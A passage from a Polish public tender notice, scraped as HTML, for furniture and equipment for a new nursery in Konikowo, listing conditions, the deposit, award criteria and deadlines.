Wykonawca ma obowiązek wykonywania montażu w uzgodnieniu z wykonawcą zadania pn.: ,,Budowa żłobka w miejscowości Konikowo". </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39000000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44410000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39161000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39130000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39140000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39710000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>31515000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32000000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30200000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34911100-7</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-08-20</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje żadnych warunków w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje żadnych warunków w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie precyzuje żadnych warunków w tym zakresie</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1)	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy,W przypadku składania oferty przez wspólników spółki cywilnej dokumenty wymienione w pkt od 1 muszą być złożone oddzielnie dla każdego ze wspólników oraz dla spółki cywilnej.DOKUMENTY PODMIOTÓW ZAGRANICZNYCH:Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu wymienionego w pkt. B niniejszej SIWZ składa:1) dokument nie otwarto jego likwidacji ani nie ogłoszono upadłości. Informacja i dokumenty o których mowa w pkt.1 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.Pozostałe oświadczenia/dokumenty wymagane w prowadzonym postępowaniu, Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa takie same jak Wykonawca polski. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania (z zachowaniem terminu odpowiednio 3 lub 6 miesięcy przed terminem składania ofert).Wszystkie dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Nie dotyczy</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji">Nie dotyczy</span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Nie dotyczy</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">C. INNE DOKUMENTY NIEWYMIENIONE W PKT A-B WYMAGANE OD WYKONAWCY(dotyczy wszystkich wykonawców składających oferty).1. WYPEŁNIONY FORMULARZ OFERTOWY sporządzony na/wg Załącznika nr 2 do SIWZ;2. Dowód wniesienia wadium - potwierdzenie wniesienia wadium należy załączyć do oferty.3. Jeżeli oferta nie zostanie podpisana przez Wykonawcę do oferty należy dołączyć PEŁNOMOCNICTWO(A) do działania w imieniu Wykonawcy (podpisanie oferty, reprezentowanie Wykonawcy, ewentualnie inne działania np. podpisanie umowy) - o ile umocowanie(a) osoby(ób) występującej(cych) w imieniu Wykonawcy nie wynikają z innych złożonych dokumentów.4. ZOBOWIĄZANIE PODMIOTU udostępniającego Wykonawcy swoje zasoby sporządzone na/wg Załącznika nr 6 do SIWZ (wypełniają tylko podmioty, które udostępniają Wykonawcy swoje zasoby) należy dołączyć do oferty (jeżeli występuje);5. OŚWIADCZENIE WYKONAWCY sporządzone na/wg załącznika 5 do SIWZ o przynależności albo braku przynależności do tej samej grupy kapitałowej. Uwaga!Wykonawca - w terminie 3 dni od zamieszczenia przez zamawiającego na stronie internetowej informacji dotyczących: kwoty którą zamierza przeznaczyć na sfinansowanie zamówienia, firm oraz adresów wykonawców, którzy złożyli oferty w terminie, ceny, terminu wykonania zamówienia i warunków płatności zawartych w ofertach,- przekazuje zamawiającemu oświadczenie o przynależności lub oświadczenie o braku przynależności do tej samej grupy kapitałowej o której mowa w art. 24 ust 1 pkt. 23 Ustawy - na/według załącznika nr 5.Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody (dokumenty lub informacje ) że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.Formularz (załącznik nr 1 do SIWZ) zawierający wyposażenie po uzupełnieniu przez Wykonawcę cen (w zależności od części zamówienia, której dotyczy oferta), należy załączyć do oferty.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">5.1	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości:Część 2: 900,00 zł (słownie: dziewięćset złotych i 00/100); Część 1, 3, 4 ,5 -nie dotyczy5.2	Wadium wnosi się przed upływem terminu składania ofert. W przypadku wniesienia wadium w pieniądzu, uiszczenie wadium uznaje się za skuteczne jeżeli znajdzie się na rachunku zamawiającego przed upływem terminu i godziny wyznaczonego do składania ofert.5.3	Wadium może być wniesione w formach określonych w art. 45 ust. 6 uPZP.5.4	Wadium w pieniądzu należy wnieść na konto Zamawiającego:Bałtycki Bank Spółdzielczy w Darłowie Nr 46 8566 0003 0001 0360 2000 0001 z opisem ,,Wadium na znak sprawy - ZP.271.157.2019".Oryginalny dowód wniesienia wadium należy dołączyć do oferty5.5	Wadium wniesione w innej formie niż pieniężna musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i ust. 5 ustawy.5.6	Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium zgodnie z zapisami ustawy zostanie wykluczony z prowadzonego postępowania, a jego oferta zostanie odrzucona.5.7 Zamawiający dokona zwrotu lub zatrzymania wadium zgodnie z art. 46 ustawy.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, za wyjątkiem przesłanek przewidzianych w art. 144 Pzp oraz wystąpienia następujących zdarzeń:1) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.2) zmiana terminu realizacji przedmiotu umowy, z przyczyn niezależnych od Wykonawcy, a także w wyniku podpisania aneksu do umowy o dofinansowanie ww. inwestycji.3) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia.4) zmiana wynagrodzenia w przypadku zmiany ustawowej stawki VAT2. Wprowadzenie zmian treści umowy wymaga sporządzenia pod rygorem nieważności pisemnego aneksu.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-07-15</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">13:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być 